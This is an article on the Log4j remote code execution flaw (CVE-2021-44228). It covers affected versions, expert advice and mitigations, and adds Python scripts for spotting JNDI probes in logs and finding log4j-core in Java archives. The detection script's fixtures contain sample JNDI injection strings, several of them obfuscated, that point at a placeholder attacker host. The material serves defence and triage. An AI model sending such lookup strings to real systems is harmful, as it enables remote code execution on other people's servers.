A serious remote code execution vulnerability in Log4j has prompted security experts to warn enterprise organizations and operators of web applications that the consequences could be catastrophic.
The vulnerability is tracked as CVE-2021-44228 on the Apache Log4j security vulnerabilities page; it allows remote attackers to take control of an affected system.
What is Log4j?
Log4j is an open source logging framework from the Apache Software Foundation that developers use to record log messages from their Java applications.
Exploitation of this flaw in the popular Java logging library leads to remote code execution (RCE). The attacker sends a specially crafted string that, when it is logged by a vulnerable version of Log4j, triggers a JNDI lookup to an attacker-controlled server; the Java code fetched from that server runs on the target, giving the attacker control of it.
Wired reported that attackers were already exploiting the vulnerability through Minecraft's chat feature as of Friday afternoon.
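To make the mechanism concrete, the following is an added Python example (it is not code from the article, from the Log4j project, or from any of the people quoted). It mimics the innermost-first expansion of `${...}` lookups that Log4j performs on a log message, supporting the `lower:`, `upper:` and `:-default` forms that attackers use to hide the `jndi` prefix, and then flags any line that ends up containing a `${jndi:<scheme>:...}` lookup. The log lines are constructed samples and `attacker.example` is a placeholder host. A real Log4j installation evaluates many more lookup types (`env:`, `sys:`, `date:` and so on), so treat this as a triage aid for logs and request captures, not as proof that a string is harmless.

```python
import re
from urllib.parse import unquote

# Constructed sample log lines (not taken from the article): benign requests mixed
# with probe strings of the shape used against CVE-2021-44228. attacker.example
# is a placeholder host.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET /?q=${${lower:J}ndi:rmi://attacker.example:1099/x} HTTP/1.1" 404',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://attacker.example/z}"',
    '10.0.0.9 - - "GET /?u=%24%7Bjndi%3Aldaps%3A%2F%2Fattacker.example%2Fq%7D HTTP/1.1" 200',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "cost ${sys:user.home} is fine"',
]

# A lookup with no further ${...} nested inside it.
INNERMOST = re.compile(r"\$\{([^${}]*)\}")
# ${jndi:<scheme>:...} after expansion; the scheme (ldap, ldaps, rmi, dns, ...) is captured.
JNDI = re.compile(r"\$\{jndi:([a-z][a-z0-9+.-]*):", re.IGNORECASE)


def _resolve(match):
    """Resolve one innermost ${...} the way the lower/upper lookups and the
    ':-default' syntax behave; anything else is left untouched."""
    body = match.group(1)
    expr, has_default, default = body.partition(":-")
    prefix, has_key, key = expr.partition(":")
    prefix = prefix.lower()
    if has_key and prefix == "lower":        # ${lower:J} -> j
        return key.lower()
    if has_key and prefix == "upper":        # ${upper:j} -> J
        return key.upper()
    if has_default:                          # ${::-j} or ${env:UNSET:-j} -> j
        # We cannot know the target's environment, so assume the default applies.
        return default
    return match.group(0)                    # unknown lookup (jndi, sys, ...): keep as-is


def normalize_lookups(text, max_rounds=20):
    """URL-decode, then expand nested lookups innermost-first until the string
    stops changing. Every resolved lookup removes one '${', so this terminates."""
    text = unquote(text)
    for _ in range(max_rounds):
        new_text = INNERMOST.sub(_resolve, text)
        if new_text == text:
            return new_text
        text = new_text
    return text


def find_jndi_probes(lines):
    """Return (line_number, scheme, normalized_line) for each line that contains a
    ${jndi:<scheme>:...} lookup once obfuscation has been expanded."""
    hits = []
    for number, line in enumerate(lines, start=1):
        normalized = normalize_lookups(line)
        for m in JNDI.finditer(normalized):
            hits.append((number, m.group(1).lower(), normalized))
    return hits


if __name__ == "__main__":
    for number, scheme, normalized in find_jndi_probes(SAMPLE_LOG_LINES):
        print(f"line {number}: jndi via {scheme}: {normalized}")
```

Running it flags lines 2 through 5 (ldap, rmi, dns and ldaps) and leaves the `${sys:user.home}` line alone. The URL-decoding step matters because web servers usually log the raw, percent-encoded request line, which a naive search for `${jndi:` would miss.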
Who is affected by Log4j security issues?
The problem is serious enough that the U.S. Cybersecurity and Infrastructure Security Agency (CISA) issued an alert on December 10 that reads in part:
“CISA encourages users and administrators to review the Apache Log4j 2.15.0 announcement and upgrade to Log4j 2.15.0 or apply the recommended mitigations immediately.”
The advisory cited above rates the severity of the problem as “critical” and describes it as follows:
“Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.”
Marcus Hutchins of MalwareTech.com warned that iCloud, Steam and Minecraft have all been confirmed vulnerable:
This log4j (CVE-2021-44228) vulnerability is extremely bad. Millions of applications use Log4j for logging, and all the attacker needs to do is get the app to log a special string. So far iCloud, Steam and Minecraft have all been confirmed vulnerable.
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
LunaSec CEO Free Wortley wrote in a December 9 blog post on the RCE zero day that “anyone using Apache Struts can be attacked.”
He added, “Given how ubiquitous this library is, the impact of the exploit (full server control), and how easy it is to exploit, the impact of this vulnerability is quite severe.”
CERT.at, the Austrian Computer Emergency Response Team, issued a warning on Friday noting that those affected include:
“All Apache log4j versions from 2.0 to 2.14.1 and all frameworks that use these versions (such as Apache Struts2, Apache Solr, Apache Druid, Apache Flink, etc.).
According to the security company LunaSec, JDK versions 6u211, 7u201, 8u191, and 11.0.1 are not affected in the default configuration, because it does not allow remote code bases to be loaded. However, if the option com.sun.jndi.ldap.object.trustURLCodebase is set to true, the attack is still possible.”
Rob Joyce, Director of Cybersecurity at the National Security Agency, tweeted on Friday: “The log4j vulnerability is a significant threat for exploitation due to its widespread inclusion in software frameworks, even NSA’s GHIDRA.”
Security experts’ advice on the Log4j vulnerability
Kevin Beaumont warned that even if you have upgraded to log4j-2.15.0-rc1, there is a bypass:
If you have upgraded your code to use the just-released log4j-2.15.0-rc1, it is still vulnerable; you now need to apply log4j-2.15.0-rc2, because there is a bypass. This has not been fixed in stable versions.
-Kevin Beaumont (@GossiTheDog) December 10, 2021
Marcus Hutchins of MalwareTech.com offered a workaround for those who cannot upgrade Log4j:
If you cannot upgrade log4j, the RCE can be mitigated by setting log4j2.formatMsgNoLookups to true (-Dlog4j2.formatMsgNoLookups=true on the JVM command line).
— Marcus Hutchins (@MalwareTechBlog) December 10, 2021
Matthew Prince, co-founder and CEO of Cloudflare, announced on Friday:
“We have decided that #Log4J is bad enough that we will try to provide at least some protection for all Cloudflare customers by default, even free customers without our WAF. We are now working on how to do that safely.”
Chris Wysopal, co-founder and CTO of Veracode, recommends upgrading to at least Java 8:
The patched version of log4j, 2.15.0, requires at least Java 8. If you are on Java 7, you need to upgrade to Java 8.
When there is an active exploit and you need to patch quickly, it helps if you have been keeping your other dependencies up to date.
— Chris Wysopal (@WeldPond) December 10, 2021
He also warned, “Maybe only 5% of applications are still on Java 7, but that is the long tail that will be exploited in the coming months. Don’t have one of these in your organization.”
Determining which applications in your organization use Log4j should be a top priority.
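One practical way to start that inventory on a server is to look inside every Java archive for the log4j-core class that implements the `${jndi:...}` lookup. The following is an added Python example (not code from the article or from the Log4j project) that walks a directory tree, opens each `.jar`, `.war`, `.ear` or `.zip`, recurses into archives nested inside them (a WAR's `WEB-INF/lib/*.jar`, for instance), and records the archive path, the log4j-core version from its Maven `pom.properties` when one is present, and whether `JndiLookup.class` is shipped. The `build_sample_tree` helper writes constructed, empty-bodied archives purely so the scan can be exercised offline; they contain no real Log4j bytecode.

```python
import io
import tempfile
import zipfile
from pathlib import Path

# The class that implements the ${jndi:...} lookup in log4j-core.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata that log4j-core jars carry; it records the artifact version.
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")


def _version_from_pom(zf):
    """Read 'version=...' from log4j-core's pom.properties, or None if absent."""
    try:
        data = zf.read(POM_PROPERTIES).decode("utf-8", "replace")
    except KeyError:
        return None
    for line in data.splitlines():
        if line.startswith("version="):
            return line.split("=", 1)[1].strip()
    return None


def inspect_archive(zf, label, findings):
    """Record this archive if it ships log4j-core, then recurse into any archive
    nested inside it so bundled copies (e.g. inside a WAR) are not missed."""
    names = set(zf.namelist())
    if JNDI_LOOKUP_CLASS in names or POM_PROPERTIES in names:
        findings.append({
            "archive": label,
            "version": _version_from_pom(zf),
            "jndi_lookup_present": JNDI_LOOKUP_CLASS in names,
        })
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as nested:
                    inspect_archive(nested, f"{label}!{name}", findings)
            except zipfile.BadZipFile:
                continue


def scan_tree(root):
    """Scan every archive under root; returns a list of finding dicts."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, str(path), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def build_sample_tree(root):
    """Write constructed archives (empty class stubs, not real Log4j code) that
    mimic real layouts: a standalone log4j-core jar, a WAR bundling an older one,
    and an unrelated jar. Used only to exercise the scanner."""
    lib = Path(root) / "app" / "lib"
    lib.mkdir(parents=True, exist_ok=True)
    with zipfile.ZipFile(lib / "log4j-core-2.14.1.jar", "w") as zf:
        zf.writestr(JNDI_LOOKUP_CLASS, b"")
        zf.writestr(POM_PROPERTIES, "version=2.14.1\nartifactId=log4j-core\n")
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(JNDI_LOOKUP_CLASS, b"")
        zf.writestr(POM_PROPERTIES, "version=2.11.2\n")
    with zipfile.ZipFile(Path(root) / "app" / "shop.war", "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.11.2.jar", inner.getvalue())
        zf.writestr("WEB-INF/web.xml", "<web-app/>")
    with zipfile.ZipFile(lib / "commons-lang3-3.12.0.jar", "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n")
    return root


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_tree(build_sample_tree(tmp))


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Against the constructed tree the scan reports two hits: the standalone `log4j-core-2.14.1.jar` and the `log4j-core-2.11.2.jar` bundled inside `shop.war`, and nothing for the unrelated jar. Shaded or repackaged "fat" jars often drop `pom.properties`, which is why the presence of `JndiLookup.class` is the primary signal and the version is only reported when it can be read. On a real host, point `scan_tree` at application directories, container image layers and any directory an application server unpacks deployments into.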
Featured image: Shutterstock/solarseven



